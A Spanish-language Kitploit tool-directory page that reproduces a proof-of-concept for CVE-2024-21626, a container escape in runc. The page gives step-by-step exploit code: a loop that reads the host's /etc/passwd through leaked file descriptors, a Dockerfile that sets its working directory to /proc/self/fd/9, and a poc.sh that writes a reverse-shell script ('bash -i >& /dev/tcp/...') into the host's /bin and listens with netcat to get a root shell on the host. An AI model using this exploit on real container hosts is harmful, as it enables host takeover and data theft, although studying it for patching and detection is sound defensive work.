Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-21626 — Prueba de concepto | Kitploit
Herramientas/GitHubGitHub/kubernetesbachelor/cve-2024-21626
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónRed TeamingEscape de Contenedores
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

Prueba de concepto

Ver Repositorio
25hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-21626

POC

Requisitos

runc 1.1.0 <= 1.1.11

Instalación del entorno vulnerable

Despliega una VM con Ubuntu 20.04 y descarga Docker siguiendo su guía

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Cambia la versión 'runc' parcheada en Docker a una vulnerable

Descarga una versión vulnerable (runc 1.1.11 o anterior) desde el repositorio de GitHub de runc: https://github.com/opencontainers/runc/releases
Elige runc.amd64 (requisito) runc_1111

Ejecutando el exploit

Ejecuta el script 'verify.sh'

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

Cambia el directorio de trabajo en el Dockerfile al fd correcto encontrado al ejecutar verify.sh

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

Construye un contenedor

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

Ejecuta la imagen del contenedor y ejecuta poc.sh en una shell bash

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

El contenedor entra en modo escucha

lytte

Se ha creado un nuevo script en la raíz de la máquina anfitriona llamado 'bash.copy' en el directorio /proc/self/cwd/../../../bin/

bash

Al hacer el script ejecutable y ejecutarlo...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... obtendrás una reverse shell con privilegios de root en la máquina anfitriona

root

Fuente

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

Descargar herramienta